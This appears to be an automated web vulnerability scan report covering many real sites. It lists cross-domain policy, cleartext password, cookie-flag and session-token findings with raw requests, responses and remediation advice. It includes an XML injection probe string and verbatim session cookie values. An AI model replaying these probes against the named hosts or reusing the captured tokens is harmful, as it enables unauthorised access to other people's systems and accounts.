HTTP/1.1 200 OK Server: nginx Content-Type: text/xml Last-Modified: Tue, 25 Jan 2011 15:13:43 GMT Vary: Accept-Encoding Content-Length: 1023 Date: Mon, 02 May 2011 22:26:32 GMT X-Varnish: 132687829 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: dmzxmweb05 X-Cache: MISS
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-FB-Server: 10.138.64.186 Date: Mon, 02 May 2011 22:33:53 GMT Content-Length: 1473 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.eni.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:55:43 GMT Last-Modified: Fri, 12 Nov 2010 08:47:16 GMT ETag: "2caf6-148-232eed00" Accept-Ranges: bytes Content-Length: 328 Connection: close Content-Type: application/xml Set-Cookie: TS782077=2dff656feed00e0ad3df2bc60f4c0f7722f0b4bab3ec8bf54dbf447e; Path=/
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: imagesdotcom.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:18:05 GMT Server: Apache/2.2.10 (Linux/SUSE) Last-Modified: Wed, 07 May 2008 05:43:55 GMT Accept-Ranges: bytes Content-Length: 133 Vary: Accept-Encoding,User-Agent ETag: "10dc6c-85-44c9d734f5cc0"-gzip Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: job24.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:29:34 GMT Server: Apache/2.0.46 (CentOS) Last-Modified: Tue, 19 Feb 2008 14:13:10 GMT ETag: "81ee02-82-78e86980" Accept-Ranges: bytes Content-Length: 130 Connection: close Content-Type: text/xml
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad-emea.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad78.neodatagroup.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT ETag: "5d8985-145-475babd3b7580" Accept-Ranges: bytes Content-Length: 325 Cache-Control: max-age=0 Expires: Mon, 02 May 2011 22:17:39 GMT Connection: close Content-Type: application/xml
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: adlev.neodatagroup.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:21:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT ETag: "5d8985-145-475babd3b7580" Accept-Ranges: bytes Content-Length: 325 Cache-Control: max-age=0 Expires: Mon, 02 May 2011 22:21:48 GMT Connection: close Content-Type: application/xml
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: cdn1.eyewonder.com
Response
HTTP/1.0 200 OK Content-Length: 261 Content-Type: text/xml Last-Modified: Wed, 08 Oct 2008 19:49:12 GMT Accept-Ranges: bytes ETag: "12b0cf07e29c91:13a0" Server: Microsoft-IIS/6.0 p3p: policyref="/200125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM" X-Powered-By: ASP.NET Cache-Control: max-age=3559 Date: Mon, 02 May 2011 22:17:05 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: elstatic.weborama.fr
Response
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=604800 Content-Type: text/xml Date: Mon, 02 May 2011 23:05:02 GMT ETag: "820671401" Expires: Mon, 09 May 2011 23:05:02 GMT Last-Modified: Wed, 12 May 2010 19:52:17 GMT Server: ECAcc (dca/5370) X-Cache: HIT Content-Length: 298 Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ieo.solution.weborama.fr
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:04:57 GMT Server: Apache Last-Modified: Wed, 12 May 2010 19:39:08 GMT ETag: "68008-12a-4866acba3af00" Accept-Ranges: bytes Content-Length: 298 Connection: close Content-Type: application/xml
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:44 GMT Server: Omniture DC/2.0.0 xserver: www12 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: omniture.virgilio.it
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:16:17 GMT Server: Omniture DC/2.0.0 xserver: www22 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: secure-it.imrworldwide.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:43 GMT Server: Apache Cache-Control: max-age=604800 Expires: Mon, 09 May 2011 22:17:43 GMT Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT ETag: "ff-4adbc4fc" Accept-Ranges: bytes Content-Length: 255 Connection: close Content-Type: application/xml
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: api.bing.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 348 Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Date: Mon, 02 May 2011 22:23:14 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-05-02T22%3a23%3a14; expires=Thu, 12-May-2011 22:23:14 GMT; domain=.bing.com; path=/ Set-Cookie: _SS=SID=20E8C6C83AEB492C83715B7C9D6D2BC0; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/ Set-Cookie: SRCHD=D=1753823&MS=1753823; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=BCC05BE254104E4CA7552CD9C2BBFAF8; expires=Wed, 01-May-2013 22:23:14 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110502; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /utenti/Registrazione.aspx HTTP/1.1 Host: du.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:07 GMT Server: Microsoft-IIS/6.0 SERVER: PRODFE1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 60355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /utenti/facebook_connect.aspx HTTP/1.1 Host: du.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:07 GMT Server: Microsoft-IIS/6.0 SERVER: PRODFE1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 14607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:30:24 GMT Server: Apache Accept-Ranges: bytes Content-Length: 6649 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
Request
GET /quotazioni.php]]>> HTTP/1.1 Host: finanza-mercati.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:28:53 GMT Server: Apache/2.2.10 (Linux/SUSE) Vary: accept-language,accept-charset,Accept-Encoding,User-Agent Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1062
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
9. Password returned in later responsepreviousnext
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.genialloyd.it
Path:
/GlfeWeb/area_personale/recupera_password.jsp
Issue description
Passwords submitted to the application are returned in clear form in later responses from the application. This behaviour increases the risk that users' passwords will be captured by an attacker. Many types of vulnerability, such as weaknesses in session handling, broken access controls, and cross-site scripting, would enable an attacker to leverage this behaviour to retrieve the passwords of other application users. This possibility typically exacerbates the impact of those other vulnerabilities, and in some situations can enable an attacker to quickly compromise the entire application.
Issue remediation
There is usually no good reason for an application to return users' passwords in its responses. This behaviour should be removed from the application.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The following cookie was issued by the application and does not have the secure flag set:
PHPSESSID=bq4jvcopcniq8jdvo0dtnu3n95; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login.php HTTP/1.1 Host: account.musfiber.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/Main.dwt" codeOutsideHTMLIsLocked="false" --> <he ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/recuperapassword.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/registrautente.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cdas187/d/a/p18485/serv.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:24 GMT Server: Apache Cache-Control: no-cache="set-cookie" Content-Length: 2923 Set-Cookie: JSESSIONID_187CDAS=h72QN1ncLn59VV1nLzn2G6CN3GxcTPPH5rL1zPy022ctxnzFxMnC!-1329674579; path=/cdas187 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cdas187/d/a/p21608/serv2.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:30 GMT Server: Apache Cache-Control: no-cache="set-cookie" Content-Length: 2923 Set-Cookie: JSESSIONID_187CDAS=zn7KN1nCQT9GwTtRG9hmSm5nLcMP5Qtv5dTLTh3yhfPQKJRJ6TTK!6541692; path=/cdas187 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cdas187/d/a/p21618/serv3.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:31 GMT Server: Apache Cache-Control: no-cache="set-cookie" Content-Length: 2923 Set-Cookie: JSESSIONID_187CDAS=4894N1nDrQnTjgkyyxpjy5R22JChxQr3lZXQCDMq1pt2gwVLcG3W!-1852540237; path=/cdas187 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.asp HTTP/1.1 Host: eprocurement.eni.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <lin ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <lin ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.0 200 OK Date: Mon, 02 May 2011 21:30:41 GMT Last-Modified: Mon, 02 May 2011 21:30:41 GMT Set-Cookie: MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.sciencedirect.com; HttpOnly; Content-Type: text/html Expires: Tue, 01 Jan 1980 04:00:00 GMT X-RE-Ref: 0 -1136083128 Server: www.sciencedirect.com 9999 138.12.6.33:443 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" > <html> <head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- TRA ...[SNIP]...
WsId=130438129946916680041160.75183102876704720416; Expires=Wed, 02 May 2012 00:08:18 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1 Host: www.webank.it Connection: keep-alive Referer: http://www.webank.it/lndpage/promo321.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.aspx HTTP/1.1 Host: feedback.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: MSIDCookie=5a1b6f4a-11e7-4f95-b279-8f8c261c145c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 15547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea ...[SNIP]...
11. Session token in URLpreviousnext There are 8 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php HTTP/1.1 Host: job24.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:29:33 GMT Server: Apache/2.0.46 (CentOS) Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Connection: close Content-Type: text/html; charset=ISO8859-1 Content-Length: 33489
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /docs/gated/campaigns/bpm_search3.htm HTTP/1.1 Host: web.progress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.progress.com/SmCreateCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=-SM-HTTP%3a%2f%2fweb%2eprogress%2ecom%2fam%2fsec%2fprocessRequest%3ftargetUrl%3d%2fdocs%2fgated%2fcampaigns%2fbpm_search3%2ehtm%3f">here</a> ...[SNIP]...
GET /s/article/9214732/Semantic_Web_Tools_you_can_use HTTP/1.1 Host: www.computerworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Language: en Content-Type: text/html; charset=UTF-8 Eirxpes: Mon, 02 May 2011 22:33:54 GMT Cneonction: close chCae-Control: private ETag: "KXAOEEJGPLSUQMTSV" Cache-Control: public, max-age=226 Expires: Mon, 02 May 2011 22:33:41 GMT Date: Mon, 02 May 2011 22:29:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 133043
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascri ...[SNIP]... </script> <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script> ...[SNIP]...
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
13. Password field submitted using GET methodpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://digg.com
Path:
/submit
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:
http://digg.com/submit
The form contains the following password field:
password
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pix.aspx?atok=zx2-2183-it&eventtype=3&aid=200&mode=html&ver=2.5&ref=&r=0.9961211793124676 HTTP/1.1 Host: rainbow.mythings.com Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
